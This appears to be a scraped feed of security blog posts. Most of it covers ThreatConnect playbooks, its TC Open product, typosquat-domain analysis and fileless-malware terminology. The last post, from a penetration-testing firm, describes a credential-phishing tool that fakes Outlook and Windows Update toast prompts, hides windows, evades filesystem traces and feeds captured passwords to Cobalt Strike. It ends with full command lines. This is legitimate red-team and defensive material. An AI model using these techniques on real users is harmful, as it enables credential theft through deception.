  7. Now, draw a line between the blue dot on the "Query OneMillion API" component and the trigger. This allows us to send information back to the user via the trigger. Double click on the trigger to edit it. Click "Next" to move to the second stage (you should see a text area with the label "Body"). In the text area, start typing "#" (again, this shows you a list of available values you can send back to the user). Select "hostRank" and save the trigger.
  8. Turn the Playbook on by clicking the "Active" toggle in the upper right-hand corner.
  9. Now for the fun part: using the Playbook! Find or create a host indicator in your ThreatConnect instance. There should be a "Playbook Actions" card on the top-right side of the indicator's page and it should list the name of the User Action trigger you provided in step five (if you didn't change the name of the User Action trigger, it will probably show up as "UserAction Trigger 1"). When you click it, the Playbook will be executed and the rank of the host (if there is one) will be returned to the right of the trigger. You now have a Playbook which lets analysts query the OneMillion API!

If you have completed the steps above and would like to contribute your playbook with the trigger in it, there are instructions for contributing to our playbooks repository here: .

If you have any questions or run into any problems with this playbook component, please raise an issue in Github. As always, let us know if you have any questions!






The post Playbook Fridays: OneMillion API Component appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

ThreatConnect’s RSA Archer Integration, Playbooks, and Apps (oh my!)

One of our top integration requests has been Playbooks for RSA Archer. Good News: we now have numerous out-of-the-box integration capabilities for connecting RSA Archer and ThreatConnect! These apps and playbooks templates allow you to perform a variety of use cases with Archer, from saving users time by automatically assigning relevant threat intelligence to cases, to instantly creating records in Archer tied to incidents in ThreatConnect.

With ThreatConnect and Archer, you can:

  • Leverage over 100 other ThreatConnect integrations to enrich information in Archer
  • Automate processes across the Archer and ThreatConnect platforms to save your team time and make them more efficient
  • Allow for easier collaboration and sharing of intelligence and information between teams and platforms

Below, you'll find an overview of the Apps and Templates available directly from ThreatConnect:


  • Get RSA Archer Record: This app retrieves an RSA Archer record. It's really important to look over the Import Archer Record Playbook if you're going to use the Get Archer Record app, as it details how to utilize the complicated Archer JSON structure within a Playbook.
  • Create RSA Archer Record: This app creates an RSA Archer record. Supported field types are Text, Numeric, Date, Values List, Attachment, IP Address, and User Lists.
  • Update RSA Archer Record:This app updates an existing RSA Archer record. Supported field types are Text, Numeric, Date, Values List, Attachment, IP Address, and User Lists.


RSA Archer | Import Archer Record

This Playbook starts with a HTTP Trigger which is intended to be triggered by an Archer advanced workflow. Once triggered, the Playbook will download and parse the Archer record based with the ID that was passed to it. From there it will create a ThreatConnect Incident and save appropriate the parsed fields in the Incident. Additionally, it will parse the Actor saved on the Archer record and either save or associated it to the Incident in ThreatConnect. Lastly, the Archer record is updated with the link back to the Incident in ThreatConnect.


RSA Archer | Create Archer Record from Incident

This Playbook starts with a User Action trigger tied to ThreatConnect Incidents. When triggered it will parse the Incident attributes and create an Archer record with relevant field.


Want to learn more about ThreatConnect? Join us for a quick 30-minute bi-weekly walkthrough of the ThreatConnect Platform. This is a live demo with one of our security engineers who will be happy to answer any questions about how ThreatConnect will fit into your current security program.

The post ThreatConnect's RSA Archer Integration, Playbooks, and Apps (oh my!) appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Web Page Monitoring

Monitor a website's content and get alerts if it changes

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Monitoring websites for changes in content is an important procedure for both offensive and defensive teams. This Playbook allows you to monitor a website's content and get alerts if it changes. It simplifies the process of monitoring website content and alerting when there are changes. At the outset, we need to be clear that this Playbook is NOT designed to monitor malicious websites. Please do not use it for that purpose!

The mechanics of the Playbook are pretty simple. It contains a timer trigger which means the Playbook can be executed on a desired interval (daily, weekly, or monthly). When the Playbook runs, it requests the website's content, computes the hash of the website's content, and compares the hash against the previous hash in the datastore. If the hash of the website's content is different on one of the Playbook executions it will send a slack message to the given channel (although you can modify this to get notified however you prefer). As the Playbook is currently designed, if the website's contents have not changed, no notification will be sent.


Getting Started

  1. Download the appropriate version for your instance of ThreatConnect. If you are running ThreatConnect version 5.6 or newer, you can use the Page Monitor.pbx. If you are using an older version on ThreatConnect, you should use Page Monitor < 5.6.pbx.
  2. Go to the "Playbooks" tab in ThreatConnect and click "New" > "Import" (on ThreatConnect versions before 5.7, you can just click the "Import" button). Then import the page monitor Playbook file you downloaded in step 1. Now, we need to setup the Playbook.
  3. To setup the Playbook, find all of the apps with a red error messages and fix the problem. For some of the apps, you may only need to open the app and re-save it.
  4. Once you are all setup, you can configure the timer trigger so that the Playbook runs when you would like it to run. From there, you're good to go! Again, please do NOT use this Playbook to monitor malicious infrastructure.


As always, if this Playbook does not fit your use-case exactly, feel free to redesign it and create the process you would like to see, or raise an issue describing your idea and one of the security developers from the community may be able to make the update for you. If you have any questions or run into any problems with this Playbook, please raise an issue in Github.













The post Playbook Fridays: Web Page Monitoring appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

10 Things Security Analysts Can Do for Free in TC Open

Find Relevant Intelligence and Stay "In the Know"

TC Open™ is the free edition of ThreatConnect. It gives you access to intelligence from many open sources (OSINT), all aggregated in one place under a unified framework.

One of the most valuable sources is our "Technical Blogs and Reports" source, which scans hundreds of popular threat intelligence and security blogs and makes them easily searchable and actionable in TC Open.

A sampling of some of the sources available in TC Open


See 10 things security analysts can do in TC Open:

  1. Search OSINT for intel on indicators, CVEs, and adversaries
  2. Check out the latest intel from your favorite security blogs
  3. Find Indicators related to a specific malware family or CVE
  4. Subscribe to your favorite intel topics
  5. Scan a text file to uncover relevant intel
  6. Download a PDF report and share it
  7. Export indicators for use in another tool or for further analysis
  8. Grab some Snort and YARA rules you can use immediately
  9. Create some daily or weekly habits using dashboards
  10. Explore and contribute to our Common Community


Search OSINT for intel on indicators, CVEs, and adversaries

Click the magnifying glass in the upper right of any page in ThreatConnect. Enter an indicator* of compromise, the name of an adversary, a malware family, a CVE, and more. Get results!

From here, click "Technical Blogs and Reports" to get some context on this indicator.


It's a scam!

Even if our free sources don't return results, we'll provide you links to dozens of popular enrichment sources so that your search doesn't have to end.


Click an Investigation Link to uncover more about an Indicator, or select "Open All" to view them all at once.

*Supported Indicators include IP Address, Host/Domain, URL, File Hash (MD5, SHA1, SHA256), Email Address, CIDR, ASN, User Agent, Mutex, and Registry Key.

Check out the latest intel from your favorite security blogs

Our Technical Blogs and Reports source (a/k/a "Tech Blogs") collects data from hundreds of popular security blogs and turns it into MRTI in ThreatConnect. To see what's new, select "Browse" from the main navigation menu, select "Technical Blogs and Reports" from the My ThreatConnect dropdown, then sort by date added.

Browse is a tabular view of all the intelligence you can access in ThreatConnect. Using the options on this page, you can filter on Indicators, Adversaries, Incidents, and more. The OSINT Dashboard (available from the "Dashboard" dropdown in the main menu) also shows the latest intel reports from Tech Blogs.


A sampling of some of the blogs we collect. You can request new ones by emailing


Find Indicators related to a specific malware family or CVE

Tags in ThreatConnect let us effectively categorize intel. Popular tags include specific CVEs, malware families, industry, and much more. You can filter the Browse screen by Tag by clicking the "Filters" button, entering a Tag (or Tags!) and clicking "Apply."


All Incidents tagged "coinhive."


You can also select the "Tags" option on the Browse screen to view a list of all Tags available to you, drill down on the Tag, and see all related intelligence.


Coinhive is a busy malware.


Subscribe to your favorite intel topics

If there's a Tag you're interested in, we'd recommend Following it so you can get notified whenever something new comes in. It's like subscribing to a topic across dozens of blogs instead of just following one blog. Just click the "Follow" option in the upper right when viewing the details of a particular Tag or other piece of intelligence.


Try it! Check out the [coinhive] Tag and click "Follow Item".

You can click on the Notification bell in the main navigation to adjust your notification preferences, e.g. instant email vs digest email.


Scan a text file to uncover relevant intel

Search lets you look for more than just one indicator or adversary or incident at a time: you can upload an entire file and have ThreatConnect scan it for indicators. For example, if you have a log file that's full of IP addresses (among other things), just save it as a text file; ThreatConnect will recognize the IPs and correlate them to known intelligence.


Correlations between a log file and intelligence in ThreatConnect


Download a PDF report and share it

Indicators of Compromise are the atomic units of threat intelligence, and in ThreatConnect the "molecules" - the higher level objects like Adversary, Incident, Campaign, etc. - are called "Groups." You can find Groups be selecting the Groups option on the Browse screen. Once you've opened up a Group, you can download it as a PDF report. This can be shared with colleagues or retained for future use.

Export indicators for use in another tool or for further analysis

Any data you find on the Browse screen can be exported to a CSV. For example, you can take all of the Indicators related to a particular CVE and export them for blocking and analysis. Or you can take all Indicators (up to 5,000 at a time) tied to an Adversary and graph them in a dataviz tool like Tableau to show activity over time.


An adversary activity report we created in Tableau from data exported for free from ThreatConnect.


Grab some Snort and YARA rules you can use immediately

Most of the intelligence is the Tech Blogs source will have Snort or YARA rules/signatures associated to it. Grab one of these signatures to easily deploy intel to your EDR, network monitoring, or threat hunting tools.


This Incident can be acted on pretty quickly.


Create some daily or weekly habits using dashboards

TC Open users get access to four free dashboards, accessible from the Dashboard dropdown on the main nav. Each dashboard presents some interesting opportunities for creating some daily habits that can make you a better security professional. See this blog for more on the importance of habits in security. Here are just a few suggested habits you can get into using these dashboards:

  • My Dashboard - Once a week, take a look at some of the items in "My Recent History." How have they changed? Has any new intel been uncovered?
  • Operations Dashboard - Once a week, review the "Popular Tags" section. What's changed? Why are different things trending week to week?
  • OSINT Dashboard - Once a day, see what's new in Tech Blogs!


Explore and contribute to our Common Community

TC Open is not limited to just consuming intelligence - you can create your own! We believe that, like life, threat intelligence is best when shared. We've written a lot on sharing in our Common Community, but in a nutshell: you can add Indicators and Groups, tell a story around an Incident or an Adversary, and most importantly get additional context from other TC Open users. And of course, you can Browse what others are doing and collaborate with them!

The post 10 Things Security Analysts Can Do for Free in TC Open appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

Playbook Fridays: Domain Spinning Workbench Spaces App

Gain insight into possible permutations of domain names to indicate suspicious activity and further analysis

For this week's Playbook Fridays post, we're mixing things up a little. Instead of directing you on how to set-up a specific Playbook, we're going to help you take advantage of an App we built which is set up on top of preconfigured Playbooks.


In Star Wars: A New Hope, Luke, Han, and Chewy are faced with the daunting task of rescuing Leia from a holding cell in the Death Star. In comparison to the Death Star, their forces are minimal and their tech is limited to the door-opening capabilities of the valiant astromech droid R2-D2. Yes, C-3PO was there but you have to admit he was totally worthless and nearly led our heroes to a disgusting demise in the dianoga-laden disposal.

Despite being overmatched in terms of numbers and technology, Luke and Han are able to traverse multiple layers of security and exfiltrate the Princess by stealing armor and impersonating Stormtroopers. Enter the First Look Vulnerability, wherein an entire security function can be undermined by the immediate trust that we place in things that simply look familiar to us. Upon initial inspection by other Death Star personnel, Luke and Han look like all the other Stormtroopers, which is why their plan was ultimately successful. A more thorough inspection of them would have revealed neither possesses appropriate Stormtrooper knowledge and neither of their biometrics match those belonging to known troopers -- notably one of them was a little short. They also possess marksmanship skills far out of proportion to your average Stormtrooper.

This same paradigm plays out daily in the cyber security world. In comparison to their targets, malicious APT groups are often overmatched in terms of sheer numbers and the technology that they have at their disposal. Large organizations often have hundreds of individuals and millions of dollars in technology dedicated to cyber security whereas an APT may have three hackers and a paltry budget dedicated to compromising those same organizations. To facilitate their malicious efforts, APTs will often take the same approach as Luke and Han: exploit the First Look Vulnerability to gain insider access.

To exploit this vulnerability, bad guys leverage domains that spoof those belonging to their targets or organizations that their target would otherwise trust. In fact, spoofed domains were an essential part of many of the large-scale APT breaches from the past three years. Notably, Chinese APT actors leveraged such domains to breach healthcare and government organizations, ultimately compromising personal information for millions of individuals. Domains such as prennera[.]com and logitech-usa[.]com (Wekby report) initially appear to be legitimate, but in fact are not and can be leveraged in a range of malicious functions from delivery to command and control. Russian APT group Fancy Bear used multiple spoofed domains like misdepatrment[.]com, actblues[.]com, and wada-arna[.]org in operations targeting organizations like the DNC, DCCC, and WADA in 2016. Criminal groups like Carbanak also have used spoofed domains like baskin-robbin[.]com and buffalo-wildwings[.]com for cybercrime. However they are used, they are often successful because these domains exploit the implicit trust we have in the familiar.

The Domain Spinning Workbench

So what? Yeah, bad guys use sneaky domains, what can we do about it? Well, a lot, as it turns out. First and foremost, these domain squats have to be identified. There are a variety of tools, including DNStwist and URLCrazy, that can help an organization identify those domains that spoof or typosquat their own or the organizations that they most frequently work with.

We've incorporated those tools into a set of apps and playbooks that can be used in ThreatConnect via our Domain Spinning Workbench. This workbench allows users to input a domain of interest and then returns all of the identified spoofed domains from one of the domain spinning tools, along with relevant WHOIS and DNS information, and then allows users to import any notable domains or registration email addresses into ThreatConnect for further research.

Configuring and Using the Workbench

To use the workbench, we'll start by configuring the Space App. Here in the configuration panel for the app, we can specify things like what Tag to apply to any imported domains or email addresses.

Further down in the configuration panel is where we can select which specific playbooks to use in the workbench. For example, for the Domain Spinning Playbook, we can choose DNSTwist, URLCrazy, Bitsquatting, or XNTwist. Depending on what type of spoofed domains we're looking for, we might change which playbook we use. We can also specify which playbook we want to use to conduct the WHOIS lookups for the identified domains.


After configuring the workbench, we can use it to spin an input domain. In our case, we're going to use our own domain to see what suspicious, ThreatConnect-spoofing domains show up.


Using the Results

As the app is running, the number of domains remaining to process is shown. During this time, the workbench is gathering results from several of the playbooks specified in the previous configuration panel. Notably, the spoofed domains are being identified and the WHOIS information for them is being pulled into the workbench.


After the playbooks have completed, the workbench returns the results. In this case, over 1700 domains possibly spoofing ours are identified. This includes both registered and unregistered domains; however, the registered domains show up first and the unregistered domains will follow and are called out as not registered. The workbench provides the WHOIS and DNS for the original, provided domain to compare against the results. This can help identify those domains that your organization has already registered.


When available, the workbench calls out the registrant email address and provides an option to import it into the ThreatConnect platform. For each identified domains there are also drop down sections for the WHOIS and DNS data that may help identify those domains that stick out based on who registered them or where they are hosted.


When importing from the workbench, you can choose to specify the given domain and/or registrant email address as suspicious, potential, or malicious.


By importing the domains that we're concerned about into ThreatConnect, we can then use ThreatConnect's various investigative capabilities to build out our understanding of the domains, the activity associated with it, and the actor(s) behind it. Below, we're using our DomainTools Spaces App to further review the WHOIS information and identify other intelligence related to the dwbot@outlook[.]com registrant.


By clicking on the arrow next to the email address, we see that dwbot@outlook[.]com has registered about 1200 domains, likely indicating they are a mass registrant. However, amongst the registered domains, we find another notable domain for us threatconnect[.]com[.]cn and several hundred other spoofed domains. Based on such consistencies, an organization might then want to proactively monitor for new domains registered by the identified registrant or actor that may be relevant to their organization.



So What Can You Do With This Information?

Knowledge of a single registration targeting your organization is helpful, but identifying trends in these registrations over a period of time can potentially identify APT activity targeting your organization. From a strategic perspective, knowledge of these domain squats may inform higher level analysis of adversary motivations against the organization or even an industry. For example, with the information we acquired via the Workbench, we took a look at spoofed and typosquatted domain registrations from Chinese registrants targeting Blue Cross Blue Shield entities Anthem, CareFirst, Empire, Excellus, Premera, Wellmark, and Wellpoint in 2015. The graph below shows the number of those domains that were registered by month against each of the specific BCBS entities.


There are some pretty clear spikes in activity, three which line up exactly with the public disclosure of breaches targeting those companies. More specifically, in these instances, registrants in China began registering the domains that caused the spike less than two days after the breaches were publicly announced. These registrations typically came from Chinese mass registrants and do not otherwise directly indicate malicious activity; however, this could be an indicator for Chinese APT activity attempting to redo its infrastructure for future efforts against those organizations after their previous attacks had been detected. Three of the other spikes didn't line up with any notable events, but in two of the cases all of the domains were registered by a single Chinese registrant.

From a threat intelligence perspective, the presence or registration of such domains does not indicate that malicious activity has taken place. However, these registrations and the context associated with them should be further investigated, analyzed, and memorialized to ensure that the organization is properly defended against any potential threats that may be attempting to exploit the First Look Vulnerability. This is where having a threat intelligence platform, like ThreatConnect, becomes integral.

Leveraging ThreatConnect's Analyze function, we were able to quickly determine whether we had any additional intelligence on the BCBS spoofing domains or their associated WHOIS information. The results indicated that the email address yuming@yinsibaohu.aliyun[.]com, a mass registrant, was previously used to register domains used in the Chinese Scanbox framework and by Chinese APT TG-3390. However, this Yuming email address has registered over two million domains, making that connection an insufficient indicator of malicious activity.

From here, we imported the domains that were associated with the spikes identified above into an Incident in ThreatConnect. Investigating each of these domains using ThreatConnect's passive DNS capabilities, we identified two additional subdomains that were active during late 2015/early 2016, www.payment-ca.antyhem[.]com and e.xcellusbcbs[.]com. These subdomains clearly represent an attempt to target BCBS entities and potentially those individuals seeking to procure their services; however, no additional information was identified indicating that they hosted malicious files.

So while these registrations may not currently signify any specific malicious activity against BCBS, ThreatConnect's Track function can be used to keep tabs of those domains or registrants that stood out most from this analysis. This would ultimately alert the user whenever additional information becomes available on the domains or when the individual registers additional domains. ThreatConnect will also identify whenever the hosting information for domains included in our incident change. This may help identify when a domain resolves to an new IP that is used in operations.


If leveraged on a daily basis, an organization can use the Domain Spinning Workbench to identify spoofed domains as they are registered and before they are used in attacks against them. From a tactical perspective, how an organization deals with such domains when they are identified depends entirely on that organization and its own motivations. However, there are variety of options in handling spoofed or typosquatted domains, including but not limited to: monitoring, blocking, sinkholing, takedowns, and purchasing. Each one of these would ultimately have different implications for the organization so it's important to thoroughly consider such options when operationalizing this intelligence.

Organizations should leverage all intelligence available to them to identify and defend against their highest priority threats. Getting back to our Star Wars reference, our heroes aren't in any danger until they are challenged on their knowledge of the Death Star. Had Empire personnel appropriately leveraged their technological advantage, biometric scanners or vocal comparison tests may have given them the intelligence necessary to challenge Luke and Han's First Look Vulnerability exploit and ultimately quash the Rebellion.

Get More Information

If this is something that interests you and you're a current ThreatConnect user, check-out the article from our Knowledge Base that will walk through all of these steps in greater detail. Click here to navigate to the ThreatConnect Knowledge Base.





The post Playbook Fridays: Domain Spinning Workbench Spaces App appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

ThreatConnect 5.7 Release Shows Advancements in Playbooks Capabilities

Juggling Priorities and Countless Orchestration Use Cases? We've Got Your Back

Automation and Orchestration are terms that are thrown around interchangeably and claimed to be supported by just about every product offering out there. The advancements in technology required to truly support scalable workflows should not be understated.

Remember those connect-the-dot games we used to love as kids? Simple, distinct, and only way one to proceed. That's a thing of the past. Organizations today have complex architectures to support business operations and keep assets secure. This requires things to happen quickly and seamlessly; passing information from one technology or team to another without confusion or delay. This can only happen in a fictional utopia, right? Wrong.

ThreatConnect users have been leveraging Playbooks to handle the automation of decision making for some time, but as the use cases requiring complex orchestration with multiple workflows increase, so must the engine driving the technology.

Orchestration is such a game changer when it comes to decreasing mean time to detect (MTTD) and mean time to respond (MTTR), as well as to allow security analysts to get away from the tedious parts of their jobs and focus on strategic aspects. With the ThreatConnect 5.7 release, we've put significant improvements in place to support your endeavors.

Playbooks User Interface Improvements

Usability is a huge factor when it comes to increasing the adoption of technology (or anything, for that matter)! We've taken your feedback and implemented a couple of items to make using our Playbooks a much easier experience. This includes items like customized tagging and labels, the ability to add notes within Playbooks, an instant view of ROI metrics associated with individual Playbooks, and enhanced search and filter capabilities to ensure you can find what you want, when you want it.

A peek into our Playbooks interface!


A better user experience is never a bad thing. These improvements allow for:

  • Quicker navigation throughout Playbooks with everything being in one place
  • Ability to organize your Playbooks the way you want with customizable tags
    • Tracking the status or development of Playbooks by tags like, "In Design", "QA",
    • Tagging Playbooks as "Enrichment", "Reporting", etc, to make filtering by Playbook type more manageable
  • Easily view, sort, and filter on Playbook name, the Trigger used, any labels you've applied, and status (Active vs. Inactive).
  • Provide context as to why certain Playbooks were set up via notes allowing for clarification and better team collaboration
  • View ROI data without needing to drill down to the actual Playbook.

Real-time Playbooks Activity Monitoring

Tying critical security operations to orchestration can be pretty nerve-racking initially. Having real-time insight into which Playbooks have run, are being run, and what's queued up is critical to understanding that things are working as intended. We've created a new Activity Dashboard which provides users with:

  • CPU Metrics
  • Memory Utilization Metrics
  • Counts of Top Playbooks Running
  • Duration of Playbooks Running
  • Most Popular Executed Apps
  • Playbooks Currently Running

Here's our updated activity dashboard where you can view multiple metrics from one view.


Real-time Playbooks Activity Monitoring gives users:

  • An instant status check to ensure things are running smoothly
  • Improved visibility and control over actively running Playbooks; making troubleshooting problematic Playbooks easier; and actively managing them much simpler
  • Quick checks for reporting on metrics like Top Executed Playbooks and Total Playbooks Executed

Addition of Playbooks Servers

Increasing adoption of orchestration is the goal, but oftentimes what's forgotten is the improvements on the back-end that must be in place to support this. To prepare for the uptick in Playbooks, ThreatConnect customers can now roll out Playbook Servers that allow them to easily and effectively scale ThreatConnect to handle thousands of Playbook executions per day, while prioritizing what's important. Each Server is its own machine, and once the Playbook Server is deployed, customers can set up multiple Playbook Workers to handle and monitor concurrent Playbook executions.

Whereas typically Playbooks are sent to the Playbook Queue and grabbed by the Default Playbook Server to be executed, we've significantly improved Quality of Service by letting users allocate Private Servers to an Organization for the highest priority Playbooks to get ahead of the queue. You can also enable high availability (HA) by deploying multiple Playbook Servers. If at any point a Playbook Server crashes, the remaining servers take over responsibilities. There is no single point of failure!

Six Workers deployed across three different Playbook Servers. This setup can easily handle six concurrent Playbooks and thousands of executions
to meet the needs of threat intel teams while allowing for high priority Playbooks to execute in real-time.


Priority Setting to Ensure Playbooks Execution

Not all Playbooks are created equal. We know that. You know that. And now the ThreatConnect Platform can know that too. Some Playbooks perform basic enrichments and send routine notifications, while others hunt for mission critical intel and loop in the entire security team about potential major incidents.

Directly from the Playbook itself, users now have the ability to assign a High/Medium/Low Priority setting to each Playbook directly from a drop down menu. Playbooks deemed "High Priority" essentially jump the queue when an action triggers it. Users even have the ability to assign specific servers to only execute high priority playbooks so that one is always available to complete the most critical operations. Think of this as a ThreatConnect Fast Pass!


We all want to make sure the important things are getting done first. We run through prioritization exercises daily, and it becomes even more critical when dealing with security operations. The ability to set Playbooks at different priorities enables the most important things to get done first.

Environment Server Improvements

Environment Servers enable ThreatConnect to communicate with technologies operating on other networks. Although Environment Servers have been present to allow ThreatConnect to communicate with, they're now what's called "headless", meaning that no longer do they need their own user interface in order to successfully work (meaning they're easier to set up).

ThreatConnect 5.7 removes the necessity of logging into this special UI to deploy Environment Servers. Now, users can download them directly from the UI in an "all-in-one" bundle that can be deployed inside a network.

Environment Server configured and ready for installation and monitoring.


These improvements introduce a new, simplified download of the environment server which translates to a secure and "turn-key" deployment inside your network!

At ThreatConnect, we encourage increased adoption and advanced use cases of orchestration for our customers. That's reflected in our ThreatConnect Platform capabilities and our dedication to improving backend functionality to support it. Avoid "automation burnout" and ensure that the most critical jobs gets done first and everything gets done fast. 

Join us for a quick 30-minute bi-weekly walkthrough of the ThreatConnect Platform. This is a live demo with one of our security engineers who will be happy to answer any questions about how ThreatConnect will fit into your current security program.


The post ThreatConnect 5.7 Release Shows Advancements in Playbooks Capabilities appeared first on ThreatConnect | Enterprise Threat Intelligence Platform.

The Language and Nature of Fileless Attacks Over Time

The language of cybersecurity evolves in step with changes in attack and defense tactics. You can get a sense for such dynamics by examining the term fileless. It fascinates me not only because of its relevance to malware—which is one of my passions—but also because of its knack for agitating many security practitioners.

I traced the origins of “fileless” to 2001, when Eugene Kaspersky (of Kaskersky Labs) used it in reference to Code Red worm’s ability to exist solely in memory. Two years later, Peter Szor defined this term in a patent for Symantec, explaining that such malware doesn’t reside in a file, but instead “appends itself to an active process in memory.”

Eugene was prophetic in predicting that fileless malware “will become one of the most widespread forms of malicious programs” due to antivirus’ ineffectiveness against such threats. Today, when I look at the ways in which malware bypasses detection, the evasion techniques often fall under the fileless umbrella, though the term expanded beyond its original meaning.

Fileless was synonymous with in-memory until around 2014.

The adversary’s challenge with purely in-memory malware is that disappears once the system restarts. In 2014, Kevin Gossett’s Symantec article explained how Powerliks malware overcame this limitation by using legitimate Windows programs rundll32.exe and powershell.exe to maintain persistence, extracting and executing malicious scripts from the registry. Kevin described this threat as “fileless,” because it avoided placing code directly on the file system. Paul Rascagnères at G Data further explained that Poweliks infected systems by using a boobietrapped Microsoft Word document.

The Powerliks discussion, and similar malware that appeared afterwards, set the tone for the way fileless attacks are described today. Yes, fileless attacks strive to maintain clearly malicious code solely or mostly in memory. Also, they tend to involve malicious documents and scripts. They often misuse utilities built into the operating system and abuse various capabilities of Windows, such as the registry, to maintain persistence.

However, the growing ambiguity behind the modern use of the term fileless is making it increasingly difficult to understand what specific methods fileless malware uses for evasion. It’s time to disambiguate this word to hold fruitful conversations about our ability to defend against its underlying tactics.

Here’s my perspective on the methods that comprise modern fileless attacks:

  • Malicious Documents: They can act as flexible containers for other files. Documents can also carry exploits that execute malicious code. They can execute malicious logic that begins the infection and initiates the next link in the infection chain.
  • Malicious Scripts: They can interact with the OS without the restrictions that some applications, such as web browsers, might impose. Scripts are harder for anti-malware tools to detect and control than compiled executables. In addition, they offer a opportunity to split malicious logic across several processes.
  • Living Off the Land: Microsoft Windows includes numerous utilities that attackers can use to execute malicious code with the help of a trusted process. These tools allow adversaries to “trampoline” from one stage of the attack to another without relying on compiled malicious executables.
  • Malicious Code in Memory: Memory injection abuses features of Microsoft Windows to interact with the OS even without exploiting vulnerabilities. Attackers can wrap their malware into scripts, documents or other executables, extracting payload into memory during runtime.

While some attacks and malware families are fileless in all aspects of their operation, most modern malware that evades detection includes at least some fileless capabilities. Such techniques allow adversaries to operate in the periphery of anti-malware software. The success of such attack methods is the reason for the continued use of term fileless in discussions among cybersecurity professionals.

Language evolves as people adjust the way they use words and the meaning they assign to them. This certainly happened to fileless, as the industry looked for ways to discuss evasive threats that avoided the file system and misused OS features. For a deeper dive into this topic, read the following three articles upon which I based this overview:

Phishing – Ask and ye shall receive

During penetration tests, our primary goal is to identify the difference in paths that can be used to obtain the goal(s) as agreed upon with our customers. This often succeeds due to insufficient hardening, lack of awareness or poor password hygiene. Sometimes we do get access to a resource, but do not have access to the username or password of the user that is logged on. In this case, a solution can be to just ask for credentials in order to increase your access or escalate our privileges throughout the network. This blogpost will go into the details of how the default credential gathering module in a pentesting framework like MetaSploit can be further improved and introduces a new tool and a Cobalt Strike module that demonstrates these improvements.

Current situation

Let’s say that we have a meterpreter running on our target system but were unable to extract user credentials. Since the meterpreter is not running with sufficient privileges, we also cannot access the part of the memory where the passwords reside. To ask the user for their credentials, we can use a post module to spawn a credential box on the user’s desktop that asks for their credentials. This credential box looks like the one in the image below.


While this often works in practice, a few problems arise with using this technique:

  • The style of the input box stems from Windows XP. When newer versions of Windows ask for your credentials, a different type of input box is used;
  • The credential box spawns out-of-the-blue. Even though a message and a title can be provided, it does not really look genuine; it misses a scenario where a credential box asking for your credentials can be justified.

A better solution

Because of these issues, this technique will perhaps not work on more security aware users. These users can be interesting targets as well, so we created a new script that solves the aforementioned problems. For creating a realistic scenario, the main approach was: “What would work on us?” The answer to this question must at least entail the following:

  • The credential box should be genuine and the same as the one that Windows uses;
  • The credential box should not be spawned out-of-the-blue; the user must be persuaded or should expect a credential box;
  • If (error) messages are used, the messages should be realistic. Real life examples are even better;
  • No or limited visible indications that the scenario is not real.

As a proof of concept, Fox-IT created a tool that uses the following two scenario’s:

  • Notifications that stem from an (installed) application;
  • System notifications that can be postponed.

With this, the attacker can use his creativity to deceive the user. Below are some examples that were created during the development of this tool:

Outlook lost connection to Microsoft Exchange. In order to reconnect, the user must specify credentials to reestablish connection to Microsoft Exchange.


Password that expires within a short period of time.


The second scenario imitates notifications from Windows itself, such as pending updates that need to be installed. The notification toast tricks the user into thinking that the updates can be postponed or dismissed. When the user clicks on the notification toast the user will be asked to supply their credentials.


If the user clicks on one of these notifications, the following credential box will pop up. The text of the credential box is fully customizable.


Once the user has submitted their credentials, the result is printed on the console which can be intercepted with a tool of your choosing, such as Cobalt strike. We created an aggressor script for Cobalt Strike that extends the user interface with a variety of phishing options.


Clicking on one of these options will launch the phishing attack on the remote computer. And if users enter their credentials, the aggressor script will store these in Cobalt Strike as well. The tool as well as the Cobalt Strike aggressor script are available on Fox-IT’s GitHub page:


Technical details

During the development of this tool, there were some hurdles that we needed to take. At first, we created a tool that pops a notification balloon. That worked quite well, however, the originating source of the balloon was mentioned in the balloon as well. It’s not really genuine when Windows Powershell ISE asks for Outlook credentials, so that was not a solution that satisfied us.


In recent versions of Windows, toast notifications were introduced. These notifications look almost the same as a notification balloon that we used earlier, but work entirely different. By using toast notifications, the problem that the originating source was shown was solved. However, it proved not possible to use event handlers on the toast notifications with native PowerShell. We needed an additional library that acts as a wrapper, which can be found on the following GitHub page:

That library solved one part of the issue, but needed to be present on the filesystem of the target computer. That leaves traces of our attack which we do not want, plus, we want to leave the least amount of traces of our malicious code. Therefore, we encoded the library as base64 and stored that in the PowerShell script. The base64 equivalent of the library is evaluated and loaded from memory during runtime and will leave no trace on the filesystem once the tool has been executed. So, now we had a tool capable of sending toast notifications that look genuine. Because of how Windows works, we could also create an extra layer of trust by using an application ID as the source of the notification toast. That way, if you were able to find the corresponding AppID, it looks like the toast notification was issued by the application rather than an attacker.

The notifcation toasts supports the following:

  • Custom toast notification title;
  • Custom credential box title;
  • Custom multiline toast notification message.

To make it more personal, it is possible to use references to attributes that are part of the System.DirectoryServices.AccountManagement.UserPrincipal object. These attributes can be found on the following Technet article: Additionally, the application scenario supports the following extra features when an application name is provided and can be found by the tool:

  • AppID lookup for adding extra layer of credibility. If no AppID is found, the tool will default to control panel;
  • Extraction of the application icon. The extracted icon will be used in the notification toast;
  • If no process is given or the process cannot be found, the tool will extract the information icon from the C:\Windows\system32\shell32.dll library. By modifying the script, it is easy to incorporate icons from other libraries as well;
  • Hiding of application processes. All windows will be hidden from the user for extra persuasion. The visibility will be restored once the tool is finished or when the user supplied their credentials.

Cmdline examples

For the examples above, the following onliners were used:

Outlook connection:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Microsoft Office Outlook" -ToastMessage "Connection to Microsoft Exchange has been lost.`r`nClick here to restore the connection" -Application "Outlook" -credBoxTitle "Microsoft Outlook" -credBoxMessage "Enter password for user ‘{emailaddress|samaccountname}'" -ToastType Application -HideProcesses

Updates are available:

.\Invoke-CredentialPhisher.ps1 -ToastTitle "Updates are available" -ToastMessage "Your computer will restart in 5 minutes to install the updates" -credBoxTitle "Credentials needed" -credBoxMessage "Please specify your credentials in order to postpone the updates" -ToastType System -Application "System Configuration"

Password expires:

